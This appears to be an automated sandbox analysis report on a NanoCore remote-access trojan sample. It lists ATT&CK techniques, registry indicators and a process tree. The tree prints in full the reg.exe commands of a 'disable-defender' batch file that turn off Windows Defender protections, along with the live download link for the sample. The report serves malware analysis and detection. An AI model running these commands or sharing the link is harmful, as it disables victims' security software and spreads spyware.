nanocore | hxxps://gofile[.]io/d/Dmq7NE

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation	XtasyExecutor.exe

Executes dropped EXE 2 IoCs

pid	Process
4840	XtasyExecutor.exe
4396	XtasyExecutor.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NAS Manager = "C:\\Program Files (x86)\\NAS Manager\\nasmgr.exe"	XtasyExecutor.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XtasyExecutor.exe

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\67c0f94a-b514-4e49-836b-be128291e9b6.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241217181138.pma	setup.exe
File created	C:\Program Files (x86)\NAS Manager\nasmgr.exe	XtasyExecutor.exe
File created	C:\Program Files (x86)\NAS Manager\nasmgr.exe\:SmartScreen:$DATA	XtasyExecutor.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XtasyExecutor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XtasyExecutor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\NAS Manager\nasmgr.exe\:SmartScreen:$DATA	XtasyExecutor.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 843977.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
460	msedge.exe
460	msedge.exe
1352	msedge.exe
1352	msedge.exe
4772	identity_helper.exe
4772	identity_helper.exe
2224	msedge.exe
2224	msedge.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe
4840	XtasyExecutor.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4840	XtasyExecutor.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4840	XtasyExecutor.exe
Token: SeDebugPrivilege	1628	taskmgr.exe
Token: SeSystemProfilePrivilege	1628	taskmgr.exe
Token: SeCreateGlobalPrivilege	1628	taskmgr.exe
Token: 33	1628	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1628	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe

Suspicious use of SendNotifyMessage 56 IoCs

pid	Process
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1352	msedge.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1352 wrote to memory of 1132	1352	msedge.exe	81
PID 1352 wrote to memory of 1132	1352	msedge.exe	81
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 4532	1352	msedge.exe	83
PID 1352 wrote to memory of 460	1352	msedge.exe	84
PID 1352 wrote to memory of 460	1352	msedge.exe	84
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85
PID 1352 wrote to memory of 1652	1352	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/Dmq7NE
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7fff49c546f8,0x7fff49c54708,0x7fff49c54718
  2⤵
  PID:1132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:1652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
  2⤵
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:1476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6092 /prefetch:8
  2⤵
  PID:1628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6320 /prefetch:8
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 /prefetch:8
  2⤵
  PID:2824
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:2108
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x1e8,0x254,0x7ff756995460,0x7ff756995470,0x7ff756995480
    3⤵
    PID:4592
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6696 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2224
- C:\Users\Admin\Downloads\XtasyExecutor.exe
  "C:\Users\Admin\Downloads\XtasyExecutor.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:4840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\disable-defender.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5932
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5988
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:6004
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:6020
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:6036
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:6052
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:6068
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:6084
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
